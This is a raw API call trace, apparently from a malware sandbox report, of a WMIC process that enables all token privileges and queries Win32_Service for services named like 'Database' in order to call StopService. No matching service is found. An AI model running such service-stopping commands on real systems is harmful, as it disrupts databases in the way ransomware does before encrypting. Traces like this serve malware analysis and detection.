SafeArrayGetLBound (in: psa=0x3581420, nDim=0x1, plLbound=0x323d780 | out: plLbound=0x323d780) returned 0x0 [0300.073] SafeArrayGetUBound (in: psa=0x3581420, nDim=0x1, plUbound=0x323d77c | out: plUbound=0x323d77c) returned 0x0 [0300.073] SafeArrayGetElement (in: psa=0x3581420, rgIndices=0x323d788, pv=0x323d798 | out: pv=0x323d798) returned 0x0 [0300.073] malloc (_Size=0x24) returned 0x34eb9f8 [0300.073] IWbemClassObject:GetPropertyQualifierSet (in: This=0x3580c78, wszProperty="ReturnValue", ppQualSet=0x323d6a8 | out: ppQualSet=0x323d6a8*=0x352b050) returned 0x0 [0300.073] malloc (_Size=0xc) returned 0x34eab70 [0300.074] IWbemQualifierSet:Get (in: This=0x352b050, wszName="CIMTYPE", lFlags=0, pVal=0x323d678*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323d678*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0300.074] free (_Block=0x34eab70) [0300.074] malloc (_Size=0xc) returned 0x34eab70 [0300.074] IWbemClassObject:Get (in: This=0x3580c78, wszName="ReturnValue", lFlags=0, pVal=0x323d650*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x323d68c*=52680308, plFlavor=0x0 | out: pVal=0x323d650*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x323d68c*=19, plFlavor=0x0) returned 0x0 [0300.074] malloc (_Size=0xc) returned 0x34eaea0 [0300.074] IWbemQualifierSet:Get (in: This=0x352b050, wszName="read", lFlags=0, pVal=0x323d690*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323d690*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0300.074] free (_Block=0x34eaea0) [0300.074] malloc (_Size=0xc) returned 0x34eae58 [0300.074] IWbemQualifierSet:Get (in: This=0x352b050, wszName="write", lFlags=0, pVal=0x323d690*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323d690*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0300.074] free (_Block=0x34eae58) [0300.074] malloc (_Size=0xc) returned 0x34eae40 [0300.075] malloc (_Size=0xc) returned 0x34eae70 [0300.075] IWbemQualifierSet:Get (in: This=0x352b050, wszName="Description", lFlags=0, pVal=0x323d668*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323d668*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0300.075] free (_Block=0x34eae70) [0300.075] malloc (_Size=0xc) returned 0x34eaea0 [0300.075] lstrlenA (lpString="Not Available") returned 13 [0300.075] malloc (_Size=0x1c) returned 0x34eba28 [0300.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x34eba28, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0300.075] free (_Block=0x34eba28) [0300.075] IUnknown:Release (This=0x352b050) returned 0x0 [0300.075] malloc (_Size=0x24) returned 0x34eba28 [0300.075] malloc (_Size=0xc) returned 0x34eaed0 [0300.075] malloc (_Size=0x24) returned 0x34eba58 [0300.075] malloc (_Size=0x38) returned 0x34eba88 [0300.075] malloc (_Size=0x24) returned 0x34ebac8 [0300.075] free (_Block=0x34eba58) [0300.075] free (_Block=0x34eba28) [0300.075] free (_Block=0x34eb9f8) [0300.075] free (_Block=0x34eae40) [0300.076] free (_Block=0x34eaea0) [0300.076] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0300.076] IWbemClassObject:GetMethodQualifierSet (in: This=0x3580a80, wszMethod="StopService", ppQualSet=0x323db9c | out: ppQualSet=0x323db9c*=0x3555a58) returned 0x0 [0300.076] malloc (_Size=0xc) returned 0x34eae10 [0300.076] IWbemQualifierSet:Get (in: This=0x3555a58, wszName="Implemented", lFlags=0, pVal=0x323db84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323db84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0300.076] free (_Block=0x34eae10) [0300.076] malloc (_Size=0xc) returned 0x34eaeb8 [0300.076] malloc (_Size=0xc) returned 0x34eaea0 [0300.076] IWbemQualifierSet:Get (in: This=0x3555a58, wszName="Description", lFlags=0, pVal=0x323db74*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x323db74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0300.077] free (_Block=0x34eaea0) [0300.077] malloc (_Size=0xc) returned 0x34eae40 [0300.077] IUnknown:Release (This=0x3555a58) returned 0x0 [0300.077] malloc (_Size=0x38) returned 0x34eb9f8 [0300.077] malloc (_Size=0x38) returned 0x34eba38 [0300.077] malloc (_Size=0x24) returned 0x34ebaf8 [0300.077] malloc (_Size=0xc) returned 0x34eae28 [0300.077] malloc (_Size=0x38) returned 0x34ebb28 [0300.077] malloc (_Size=0x38) returned 0x34ebb68 [0300.077] malloc (_Size=0x24) returned 0x34ebba8 [0300.077] malloc (_Size=0x28) returned 0x34ebbd8 [0300.078] malloc (_Size=0x38) returned 0x34ebc08 [0300.078] malloc (_Size=0x38) returned 0x34ebc48 [0300.078] malloc (_Size=0x24) returned 0x34ebc88 [0300.078] free (_Block=0x34ebba8) [0300.078] free (_Block=0x34ebb68) [0300.078] free (_Block=0x34ebb28) [0300.078] free (_Block=0x34ebaf8) [0300.078] free (_Block=0x34eba38) [0300.078] free (_Block=0x34eb9f8) [0300.078] IUnknown:Release (This=0x3580c78) returned 0x0 [0300.078] free (_Block=0x34ebac8) [0300.078] free (_Block=0x34eba88) [0300.078] free (_Block=0x34eb9b8) [0300.078] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="PauseService", ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x3557380) returned 0x0 [0300.078] lstrlenW (lpString="PauseService") returned 12 [0300.078] lstrlenW (lpString="stopservice") returned 11 [0300.078] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0300.078] IUnknown:Release (This=0x3557380) returned 0x0 [0300.078] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="ResumeService", ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x3557380) returned 0x0 [0300.078] lstrlenW (lpString="ResumeService") returned 13 [0300.078] lstrlenW (lpString="stopservice") returned 11 [0300.079] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0300.079] IUnknown:Release (This=0x3557380) returned 0x0 [0300.079] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="InterrogateService", ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x3557380) returned 0x0 [0300.079] lstrlenW (lpString="InterrogateService") returned 18 [0300.079] lstrlenW (lpString="stopservice") returned 11 [0300.079] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0300.079] IUnknown:Release (This=0x3557380) returned 0x0 [0300.079] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="UserControlService", ppInSignature=0x323dc3c*=0x3580c78, ppOutSignature=0x323dc38*=0x35835a8) returned 0x0 [0300.079] lstrlenW (lpString="UserControlService") returned 18 [0300.079] lstrlenW (lpString="stopservice") returned 11 [0300.079] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0300.079] IUnknown:Release (This=0x3580c78) returned 0x0 [0300.079] IUnknown:Release (This=0x35835a8) returned 0x0 [0300.079] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="Create", ppInSignature=0x323dc3c*=0x3580c78, ppOutSignature=0x323dc38*=0x3585700) returned 0x0 [0300.080] lstrlenW (lpString="Create") returned 6 [0300.080] lstrlenW (lpString="stopservice") returned 11 [0300.080] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0300.080] IUnknown:Release (This=0x3580c78) returned 0x0 [0300.080] IUnknown:Release (This=0x3585700) returned 0x0 [0300.080] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="Change", ppInSignature=0x323dc3c*=0x3580c78, ppOutSignature=0x323dc38*=0x3585480) returned 0x0 [0300.080] lstrlenW (lpString="Change") returned 6 [0300.080] lstrlenW (lpString="stopservice") returned 11 [0300.081] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0300.081] IUnknown:Release (This=0x3580c78) returned 0x0 [0300.081] IUnknown:Release (This=0x3585480) returned 0x0 [0300.081] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="ChangeStartMode", ppInSignature=0x323dc3c*=0x3580c78, ppOutSignature=0x323dc38*=0x3583730) returned 0x0 [0300.081] lstrlenW (lpString="ChangeStartMode") returned 15 [0300.081] lstrlenW (lpString="stopservice") returned 11 [0300.081] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0300.081] IUnknown:Release (This=0x3580c78) returned 0x0 [0300.081] IUnknown:Release (This=0x3583730) returned 0x0 [0300.081] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="Delete", ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x3557380) returned 0x0 [0300.081] lstrlenW (lpString="Delete") returned 6 [0300.081] lstrlenW (lpString="stopservice") returned 11 [0300.081] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0300.081] IUnknown:Release (This=0x3557380) returned 0x0 [0300.081] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="GetSecurityDescriptor", ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x3580c78) returned 0x0 [0300.081] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0300.082] lstrlenW (lpString="stopservice") returned 11 [0300.082] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0300.082] IUnknown:Release (This=0x3580c78) returned 0x0 [0300.082] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="SetSecurityDescriptor", ppInSignature=0x323dc3c*=0x3580c78, ppOutSignature=0x323dc38*=0x35835a8) returned 0x0 [0300.082] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0300.082] lstrlenW (lpString="stopservice") returned 11 [0300.082] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0300.082] IUnknown:Release (This=0x3580c78) returned 0x0 [0300.082] IUnknown:Release (This=0x35835a8) returned 0x0 [0300.082] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0) returned 0x40005 [0300.082] IUnknown:Release (This=0x3580a80) returned 0x0 [0300.082] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0300.082] lstrlenW (lpString="SET") returned 3 [0300.082] lstrlenW (lpString="call") returned 4 [0300.082] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0300.082] lstrlenW (lpString="CREATE") returned 6 [0300.082] lstrlenW (lpString="call") returned 4 [0300.082] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0300.082] free (_Block=0x34e2ce0) [0300.082] malloc (_Size=0x4) returned 0x34e2ee8 [0300.083] lstrlenW (lpString="GET") returned 3 [0300.083] lstrlenW (lpString="call") returned 4 [0300.083] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0300.083] lstrlenW (lpString="LIST") returned 4 [0300.083] lstrlenW (lpString="call") returned 4 [0300.083] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0300.083] lstrlenW (lpString="ASSOC") returned 5 [0300.083] lstrlenW (lpString="call") returned 4 [0300.083] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0300.083] WbemLocator:IUnknown:AddRef (This=0x35248f0) returned 0x3 [0300.083] free (_Block=0x34e2788) [0300.083] lstrlenW (lpString="") returned 0 [0300.083] lstrlenW (lpString="NQDPDE") returned 6 [0300.083] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0300.083] lstrlenW (lpString="NQDPDE") returned 6 [0300.083] malloc (_Size=0xe) returned 0x34eaea0 [0300.083] lstrlenW (lpString="NQDPDE") returned 6 [0300.083] GetCurrentThreadId () returned 0x12ac [0300.083] GetCurrentProcess () returned 0xffffffff [0300.083] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x323fd1c | out: TokenHandle=0x323fd1c*=0x2f8) returned 1 [0300.083] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x323fd18 | out: TokenInformation=0x0, ReturnLength=0x323fd18) returned 0 [0300.083] malloc (_Size=0x118) returned 0x34eb9b8 [0300.083] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x34eb9b8, TokenInformationLength=0x118, ReturnLength=0x323fd18 | out: TokenInformation=0x34eb9b8, ReturnLength=0x323fd18) returned 1 [0300.084] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x34eb9b8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0300.084] free (_Block=0x34eb9b8) [0300.084] CloseHandle (hObject=0x2f8) returned 1 [0300.084] lstrlenW (lpString="GET") returned 3 [0300.084] lstrlenW (lpString="call") returned 4 [0300.084] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0300.084] lstrlenW (lpString="LIST") returned 4 [0300.084] lstrlenW (lpString="call") returned 4 [0300.084] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0300.084] lstrlenW (lpString="SET") returned 3 [0300.084] lstrlenW (lpString="call") returned 4 [0300.084] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0300.084] lstrlenW (lpString="CALL") returned 4 [0300.084] lstrlenW (lpString="call") returned 4 [0300.084] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0300.084] ??0CHString@@QAE@XZ () returned 0x323fcdc [0300.084] GetCurrentThreadId () returned 0x12ac [0300.084] malloc (_Size=0xc) returned 0x34eae10 [0300.084] malloc (_Size=0xc) returned 0x34eae88 [0300.084] malloc (_Size=0xc) returned 0x34eae58 [0300.085] malloc (_Size=0xc) returned 0x34eae70 [0300.085] malloc (_Size=0xc) returned 0x34e98c8 [0300.085] SysStringLen (param_1="\\\\") returned 0x2 [0300.085] SysStringLen (param_1="NQDPDE") returned 0x6 [0300.085] malloc (_Size=0xc) returned 0x34ec078 [0300.085] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0300.085] SysStringLen (param_1="\\") returned 0x1 [0300.085] malloc (_Size=0xc) returned 0x34ec048 [0300.085] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0300.085] SysStringLen (param_1="root\\cimv2") returned 0xa [0300.085] free (_Block=0x34ec078) [0300.085] free (_Block=0x34e98c8) [0300.085] free (_Block=0x34eae70) [0300.085] free (_Block=0x34eae58) [0300.085] free (_Block=0x34eae88) [0300.086] free (_Block=0x34eae10) [0300.086] malloc (_Size=0xc) returned 0x34ec060 [0300.086] malloc (_Size=0xc) returned 0x34ec090 [0300.086] malloc (_Size=0xc) returned 0x34ec030 [0300.086] WbemLocator:IWbemLocator:ConnectServer (in: This=0x35248f0, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x3580f78) returned 0x0 [0300.095] free (_Block=0x34ec030) [0300.096] free (_Block=0x34ec090) [0300.096] free (_Block=0x34ec060) [0300.096] CoSetProxyBlanket (pProxy=0x3580f78, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0300.096] free (_Block=0x34ec048) [0300.096] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0300.096] ??0CHString@@QAE@XZ () returned 0x323fcd4 [0300.096] GetCurrentThreadId () returned 0x12ac [0300.096] malloc (_Size=0x38) returned 0x34eb9b8 [0300.096] malloc (_Size=0x28) returned 0x34eb9f8 [0300.096] malloc (_Size=0x28) returned 0x34eba28 [0300.096] malloc (_Size=0x38) returned 0x34eba58 [0300.096] malloc (_Size=0x38) returned 0x34eba98 [0300.096] malloc (_Size=0x24) returned 0x34ebad8 [0300.096] malloc (_Size=0xc) returned 0x34eae70 [0300.096] lstrlenA (lpString="") returned 0 [0300.096] malloc (_Size=0x2) returned 0x34e2788 [0300.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x34e2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0300.097] free (_Block=0x34e2788) [0300.097] malloc (_Size=0x38) returned 0x34ebb08 [0300.097] malloc (_Size=0x24) returned 0x34ebb48 [0300.097] malloc (_Size=0xc) returned 0x34eae58 [0300.097] free (_Block=0x34eae70) [0300.097] IWbemServices:GetObject (in: This=0x3580f78, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x323fcac*=0x0, ppCallResult=0x0 | out: ppObject=0x323fcac*=0x3580a80, ppCallResult=0x0) returned 0x0 [0300.155] malloc (_Size=0xc) returned 0x34eae10 [0300.155] IWbemClassObject:GetMethod (in: This=0x3580a80, wszName="stopservice", lFlags=0, ppInSignature=0x323fcc8, ppOutSignature=0x323fca8 | out: ppInSignature=0x323fcc8*=0x0, ppOutSignature=0x323fca8*=0x3580c78) returned 0x0 [0300.155] free (_Block=0x34eae10) [0300.155] IUnknown:Release (This=0x3580c78) returned 0x0 [0300.155] IUnknown:Release (This=0x3580a80) returned 0x0 [0300.155] ??0CHString@@QAE@XZ () returned 0x323fb8c [0300.155] GetCurrentThreadId () returned 0x12ac [0300.155] malloc (_Size=0xc) returned 0x34eae70 [0300.155] lstrlenA (lpString="") returned 0 [0300.155] malloc (_Size=0x2) returned 0x34e2788 [0300.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x34e2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0300.155] free (_Block=0x34e2788) [0300.156] malloc (_Size=0xc) returned 0x34eae88 [0300.156] lstrlenA (lpString="") returned 0 [0300.156] malloc (_Size=0x2) returned 0x34e2788 [0300.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x34e2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0300.156] free (_Block=0x34e2788) [0300.156] malloc (_Size=0xc) returned 0x34eae10 [0300.156] free (_Block=0x34eae88) [0300.156] malloc (_Size=0xc) returned 0x34eae88 [0300.156] lstrlenA (lpString="SELECT * FROM ") returned 14 [0300.156] malloc (_Size=0x1e) returned 0x34ebb78 [0300.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x34ebb78, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0300.156] free (_Block=0x34ebb78) [0300.156] malloc (_Size=0xc) returned 0x34e98c8 [0300.156] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0300.156] SysStringLen (param_1="Win32_Service") returned 0xd [0300.156] free (_Block=0x34eae88) [0300.156] malloc (_Size=0xc) returned 0x34eae88 [0300.156] malloc (_Size=0xc) returned 0x34ebef8 [0300.156] lstrlenA (lpString=" WHERE ") returned 7 [0300.156] malloc (_Size=0x10) returned 0x34ebf88 [0300.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x34ebf88, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0300.156] free (_Block=0x34ebf88) [0300.157] malloc (_Size=0xc) returned 0x34ebee0 [0300.157] SysStringLen (param_1=" WHERE ") returned 0x7 [0300.157] SysStringLen (param_1="name like '%%Database%%'") returned 0x18 [0300.157] malloc (_Size=0xc) returned 0x34ebfd0 [0300.157] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0300.157] SysStringLen (param_1=" WHERE name like '%%Database%%'") returned 0x1f [0300.157] free (_Block=0x34e98c8) [0300.157] free (_Block=0x34ebee0) [0300.157] free (_Block=0x34ebef8) [0300.157] free (_Block=0x34eae88) [0300.157] malloc (_Size=0xc) returned 0x34ebf28 [0300.157] IWbemServices:ExecQuery (in: This=0x3580f78, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%Database%%'", lFlags=48, pCtx=0x0, ppEnum=0x323fb98 | out: ppEnum=0x323fb98*=0x3584868) returned 0x0 [0300.173] free (_Block=0x34ebf28) [0300.173] CoSetProxyBlanket (pProxy=0x3584868, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0300.179] IEnumWbemClassObject:Next (in: This=0x3584868, lTimeout=-1, uCount=0x1, apObjects=0x323fb94, puReturned=0x323fb84 | out: apObjects=0x323fb94*=0x0, puReturned=0x323fb84*=0x0) returned 0x1 [0302.061] IUnknown:Release (This=0x3584868) returned 0x0 [0302.063] free (_Block=0x34ebfd0) [0302.063] free (_Block=0x34eae10) [0302.063] free (_Block=0x34eae70) [0302.063] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0302.063] free (_Block=0x34eae58) [0302.064] free (_Block=0x34ebad8) [0302.064] free (_Block=0x34eba98) [0302.064] free (_Block=0x34eba58) [0302.064] free (_Block=0x34eba28) [0302.064] free (_Block=0x34eb9f8) [0302.064] free (_Block=0x34ebb48) [0302.064] free (_Block=0x34ebb08) [0302.064] free (_Block=0x34eb9b8) [0302.064] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0302.064] GetCurrentThreadId () returned 0x12ac [0302.064] ??0CHString@@QAE@PBG@Z () returned 0x323fd4c [0302.064] ??YCHString@@QAEABV0@PBG@Z () returned 0x323fd4c [0302.064] malloc (_Size=0x800) returned 0x34ec0c0 [0302.064] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x34ec0c0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0302.064] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 